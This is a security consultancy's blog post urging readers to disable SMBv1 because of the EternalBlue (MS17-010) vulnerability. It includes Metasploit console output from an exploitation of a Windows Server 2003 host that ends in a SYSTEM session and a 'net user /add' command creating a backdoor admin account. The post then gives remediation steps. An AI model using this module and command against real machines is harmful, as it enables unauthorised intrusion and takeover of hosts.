TL;DR


set-smbserverconfiguration -EnableSMB1Protocol $false

Everyone has heard about the Eternalblue exploit that was been running wild in late 2017.

This exploit was used to spread ransomware around the world and it caused huge frustration, costs and overall panic in the workplace. Even popular TV shows like The Good Wife got scammed with ransomware. All this because a little SMB v1 exploit was being leveraged to gain entry and encrypt files.

Not safe yet


So, it's June 2018 , and you would assume that people have patched and updated their computers and so we are safe now.

Unfortunately, it’s a daily occurrence here at GTconsult that our A-Team Protection team have found that the easiest and most abundant exploit is still the Eternalblue SMB v1 hack.

A lot of our clients still have old 2003 legacy machines that cannot be retired due to some line of business system that cannot be upgraded or moved. In this case, we have a Windows Server 2003 3790 Service Pack 2 vulnerable machine.
[+] 10.89.32.4:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 Service Pack 2

msf auxiliary(admin/smb/ms17_010_command) > run

[*] 10.89.32.4:445 - Target OS: Windows Server 2003 3790 Service Pack 2
[*] 10.89.32.4:445 - Filling barrel with fish... done
[*] 10.89.32.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.89.32.4:445 - [*] Preparing dynamite...
[*] 10.89.32.4:445 - Trying stick 1 (x64)...Miss
[*] 10.89.32.4:445 - [*] Trying stick 2 (x86)...Boom!
[*] 10.89.32.4:445 - [+] Successfully Leaked Transaction!
[*] 10.89.32.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.89.32.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.89.32.4:445 - Reading from CONNECTION struct at: 0x89a2bad8
[*] 10.89.32.4:445 - Built a write-what-where primitive...
[+] 10.89.32.4:445 - Overwrite complete... SYSTEM session obtained!
[+] 10.89.32.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.89.32.4:445 - checking if the file is unlocked
[*] 10.89.32.4:445 - Getting the command output...
[*] 10.89.32.4:445 - Executing cleanup...
[+] 10.89.32.4:445 - Cleanup was successful
[+] 10.89.32.4:445 - Command completed successfuly!
[*] 10.89.32.4:445 - Output for "net user /add gtconsult SDFGE%YSDFsaf12":
And there you have it, we have made a local admin called GTconsult on the server and now own the box. All because SMB v1 was not disabled and will probably lead to us moving latterly to other machines and gain domain admin credentials.

So how do we stop this from happening


The best thing to do is disable SMB v1 and here are a few methods on how to do that:

Method 1 – PowerShell. set-smbserverconfiguration -EnableSMB1Protocol $false



Method 2 – Windows Configuration


Open Windows Features and uncheck SMB 1.0/CIFS File Sharing Support




This should make you safe again. Happy working!

Jordan Govender
Jordan Govender
Designer. Musician. Part of GTconsult's A-Team. Enabling secure productivity daily!

Leave a Reply

Your email address will not be published. Required fields are marked *

*